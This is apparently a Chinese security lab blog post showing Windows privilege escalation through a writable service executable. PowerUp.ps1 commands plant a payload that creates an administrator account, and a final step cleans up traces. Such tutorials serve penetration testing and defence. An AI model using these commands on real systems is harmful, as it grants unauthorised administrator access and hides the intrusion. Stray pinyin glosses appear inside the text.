古語有雲：“學如逆水行舟，不進則退。”面對如今随時都在變化的網絡安全環境更是如此。爲此，創信華通微信公衆号特開(kāi)設“創安實驗室專欄”，以記錄創信華通創安實驗室在技術上的探索，加強同行間的交流，相互學習，共同進步。

✦+

原理：利用PowerUp.ps1生(shēng)成一(yī)個可以執行我(wǒ)們構造的惡意命令的同名可執行程序并替換原本的可執行程序。主程序執行時調用同名可執行程序來執行我(wǒ)們構造的惡意命令。

查找具有可寫的可執行文件：powershell.exe -Version 2 -nop -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

查看程序對用戶的權限：icacls "D:\tools\KGMusic\9.1.44.23567\service.exe"

利用可執行文件提權，向可寫程序中(zhōng)寫入創建用戶的payload：powershell.exe -Version 2 -nop -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Write-ServiceEXE -ServiceName KugouService -Username jin -Password jin -Verbose}"

等待服務重啓或對應程序再次運行：

可以看到此時新建了一(yī)個管理員(yuán)權限的用戶jin

清理痕迹：powershell.exe -Version 2 -nop -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Restore-ServiceEXE -ServiceName KugouService}"

創安實驗室